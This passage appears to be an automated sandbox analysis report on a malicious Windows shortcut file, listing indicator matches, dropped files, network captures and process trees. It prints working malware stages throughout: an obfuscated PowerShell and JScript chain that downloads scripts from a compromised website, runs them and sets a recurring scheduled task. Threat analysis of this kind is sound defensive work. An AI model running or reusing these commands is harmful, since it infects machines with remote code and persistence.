  https://www.baidu.com/link?url=PR7h_t_ZizoWZdjSMLubWVmCX_p6239c2z0KzH4cKS_&wd=ZC5rZW5uZWR5QGNoY2ZsLm9yZw== | malicious | Unknown | 46.254.36.239

Match 3b5074b1b5d032e5620f69f9f700ff0e:
  6K2g0GMmIE.lnk | malicious | Unknown | 46.254.34.201
  G9eWTvswoH.lnk | malicious | Unknown | 46.254.34.201
  INTRUM65392.pdf.lnk | malicious | Unknown | 46.254.34.201
  file.exe | malicious | Amadey, Stealc, Vidar | 46.254.34.201
  file.exe | malicious | LummaC Stealer | 46.254.34.201
  P#U0142atno#U015b#U0107 8557899,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 46.254.34.201
  https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevuc | malicious | HTMLPhisher | 46.254.34.201
  http://www.abvt.com.au/netsuite-user | malicious | Unknown | 46.254.34.201
  http://www.abvt.com.au/netsuite-user | malicious | Unknown | 46.254.34.201
  file.exe | malicious | Discord Token Stealer, DotStealer | 46.254.34.201
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (398)
                                            Category:dropped
                                            Size (bytes):1288
                                            Entropy (8bit):5.725267952895809
                                            Encrypted:false
                                            SSDEEP:24:iJr+PoLb+CIzf5j1MVL+kUE+QQAVl/sqQ1cEE2Rgjzku/uN:ErK0KZVjSVCRH2lnMbl+Eu/uN
                                            MD5:601FCB25B7FCFC2493B8347F1CC2C95E
                                            SHA1:EEBD8760BED3892FA439BA696BEA16A7DE2447E1
                                            SHA-256:4BFAB7DBCCDFCA0F592618EB7C865619E81FA3088146B0D6FC262AE418E4F53C
                                            SHA-512:4F3D9BFECFC79149CC622AD67AE40DAF3A80C14CF014493854C44C3433F1A2EC75B34000EAE3E1DF80712EF12B894C450224FE44D58C6D079C35EA618B916608
                                            Malicious:false
                                            Preview:var f1="Scr",f2="ing.Fi",f3="stemOb".var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject").var w1="WSc",w2="riPt",w4="eLl".var wsh=w1+w2+".sH"+w4.var bbj=new ActiveXObject(wsh).var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32".var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe".var agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid')+'r.js'.if (WScript.ScriptName != agn) {..var fs5="yFi"..try {..fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\"+agn)..} catch (e) {}.}.var mtx_name="7zFEPMR8R5JM".var mtx_file = bbj.ExpandEnvironmentStrings("%t"+"emp%")+"\\"+mtx_name.var fs1="leteFi".var fs2="leExis".try {..fso["De"+fs1+"le"](mtx_file).} catch (e) {}.if (!fso["Fi"+fs2+"ts"](mtx_file)).{..bbj.Run(rd+" -command \"$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'ht
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):304
                                            Entropy (8bit):5.389083644060431
                                            Encrypted:false
                                            SSDEEP:6:qcYrhvmVs8Gz797cfoKgEFULvrlAZ9HFiVu5h3BbRnK6U:HYrhvF8879qoZsirauIBbRnDU
                                            MD5:902D822E01B69F5C888C532E2DA59CEF
                                            SHA1:147B63087E5A2F699D400415DD74FBEEDBFB6B1F
                                            SHA-256:558678AF210925EDB28A5EF2DE95B4FC78D0D588749DD6194567850C5154B61E
                                            SHA-512:2431832BCC697DCFEC277F039E66809FBAA17082F2EF2272EB6786D5E7AD1F62D59D61AB4A8A06B44271D4F8F8C0D7F29F68C36AC4420884FE68A5040CD5954A
                                            Malicious:false
                                            Preview:var fnn = new ActiveXObject("WScript.Shell")..fnn.Run("powershell -command \"IWR -outfi $env:programdata\\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + " /f; wscript $env:programdata\\NDU462JA8L5M.js \"", 0)
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5398
                                            Entropy (8bit):3.5022281177226664
                                            Encrypted:false
                                            SSDEEP:48:rhrD2dLXuHWJIJlAh/WPXdl64SogZoEJdJagh/WPXdlJ4SogZoEJdJO1:rhWuohe/dQHlhe/d5HC
                                            MD5:6100940A4F606D76B0F3647181055D36
                                            SHA1:DEB567AD2D29DB97FE1CB0723E87EF7FED75213C
                                            SHA-256:8CC71F9C7321FD41C09B145DD5E32FCBDA73FD03EF531E12E9C2BEB3BAA38E69
                                            SHA-512:CFDCE411D4EE1C1C6253D9EEF3CC8D2BF3131B5A1217A1AC291FD10FE3D2ED95A90AD90E24D2814A1C9386E0A90C6A2B1FCB5C888374A4406D571218009629D8
                                            Malicious:false
                                            Preview:...................................FL..................F.`.. ....s.0a...<..t[E....ks[E..q............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_....."2a...<..t[E....j.2.q....Y.A .YT6GJF~1.LNK..N......EW.>.Y.A..............................y.T.6.g.J.F.N.0.S.R...l.n.k.......X...............-.......W.............h......C:\Users\user\Desktop\yT6gJFN0SR.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.............................................................................................................
                                            File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
                                            Entropy (8bit):3.3754418958726147
                                            TrID:
                                            • Windows Shortcut (20020/1) 100.00%
                                            File name:yT6gJFN0SR.lnk
                                            File size:3'953 bytes
                                            MD5:a8adbb0f006cbb7a70d7c2dcb0e2cff6
                                            SHA1:38f9fbf5a68943dc8f265191bb302722afed95d7
                                            SHA256:d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c
                                            SHA512:97686340a9b30c0516f8f7ac76a19a6547a6e407588dca5ac042ac767af0c57560059457e8042ccb2d3a031637d5ebd2d299e14446c6e0768c5cae75c1ae45fb
                                            SSDEEP:48:8Yk110gZ1sAT1IUPKrb4ytbRVMXsEbS0A4DgdoITXuHhKA:8Yk12msEIBv4yJQcCA4DRauB
                                            TLSH:A881CE202BF50758F6F38F3EA8BBB21259BF7955DD21CA8D10A0424C0872A15D976F7B
                                            File Content Preview:L..................F.B.. .....qf.........@..N.rf.................................P.O. .:i.....+00.../C:\...................V.1.....sY....Windows.@........OwHzYD}.... .......................7.W.i.n.d.o.w.s.....Z.1.....zY+n..System32..B........OwHzY........
                                            Icon Hash:72d282828e8d8dd5

                                            General

                                            Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Command Line Argument: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
                                            Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T09:15:10.115267+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49700 | 46.254.34.201 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 09:15:05.441310883 CET | 49774 | 53 | 192.168.2.7 | 1.1.1.1
Dec 3, 2024 09:15:05.579751968 CET | 53 | 49774 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 09:15:05.441310883 CET | 192.168.2.7 | 1.1.1.1 | 0x470a | Standard query (0) | www.italialife24.it | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 09:15:05.579751968 CET | 1.1.1.1 | 192.168.2.7 | 0x470a | No error (0) | www.italialife24.it | italialife24.it | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 09:15:05.579751968 CET | 1.1.1.1 | 192.168.2.7 | 0x470a | No error (0) | italialife24.it | | 46.254.34.201 | A (IP address) | IN (0x0001) | false

• www.italialife24.it
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 46.254.34.201 | 443 | 6652 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-03 08:15:07 UTC | 113 | OUT | GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
Host: www.italialife24.it
Connection: Keep-Alive
2024-12-03 08:15:07 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 08:15:07 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-12-03 08:15:07 UTC | 18 | IN | Data Raw: 38 0d 0a 77 73 63 72 69 70 74 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8wscript 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49700 | 46.254.34.201 | 443 | 6652 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-03 08:15:09 UTC | 92 | OUT | GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
Host: www.italialife24.it
2024-12-03 08:15:10 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 08:15:09 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-12-03 08:15:10 UTC | 316 | IN | Data Raw: 31 33 30 0d 0a 76 61 72 20 66 6e 6e 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 66 6e 6e 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 5c 22 49 57 52 20 2d 6f 75 74 66 69 20 24 65 6e 76 3a 70 72 6f 67 72 61 6d 64 61 74 61 5c 5c 4e 44 55 34 36 32 4a 41 38 4c 35 4d 2e 6a 73 20 2d 75 73 65 62 61 73 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 61 6c 69 61 6c 69 66 65 32 34 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 35 2f 61 66 72 65 74 50 66 2e 70 68 70 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 22 20 2b 20 57 53 63 72 69 70 74 2e 61 72 67 75 6d 65 6e 74 73 28 30 29 20 2b 20 22
Data Ascii: 130var fnn = new ActiveXObject("WScript.Shell")fnn.Run("powershell -command \"IWR -outfi $env:programdata\\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + "


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49702 | 46.254.34.201 | 443 | 7428 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-03 08:15:17 UTC | 202 | OUT | GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.italialife24.it
Connection: Keep-Alive
2024-12-03 08:15:17 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 08:15:17 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-12-03 08:15:17 UTC | 1300 | IN | Data Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49783 | 46.254.34.201 | 443 | 7932 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-03 08:15:51 UTC | 202 | OUT | GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.italialife24.it
Connection: Keep-Alive
2024-12-03 08:15:51 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 08:15:51 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-12-03 08:15:51 UTC | 1300 | IN | Data Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49913 | 46.254.34.201 | 443 | 6256 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-03 08:16:49 UTC | 202 | OUT | GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.italialife24.it
Connection: Keep-Alive
2024-12-03 08:16:50 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 08:16:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-12-03 08:16:50 UTC | 1300 | IN | Data Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


Target ID: 0
Start time: 03:15:02
Start date: 03/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 03:15:02
Start date: 03/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 03:15:09
Start date: 03/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
Imagebase: 0x7ff6e7da0000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 03:15:11
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Imagebase: 0x7ff63c900000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 03:15:14
Start date: 03/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 03:15:14
Start date: 03/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 03:15:17
Start date: 03/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Imagebase: 0x7ff6e7da0000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 03:15:17
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Imagebase: 0x7ff63c900000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 17
Start time: 04:32:01
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Imagebase: 0x7ff63c900000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 18
Start time: 04:32:01
Start date: 03/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 19
Start time: 04:32:01
Start date: 03/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 04:32:04
Start date: 03/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
Imagebase: 0x7ff6e7da0000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 04:32:04
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
Imagebase: 0x7ff63c900000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 04:33:00
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
Imagebase: 0x7ff63c900000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 04:33:00
Start date: 03/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
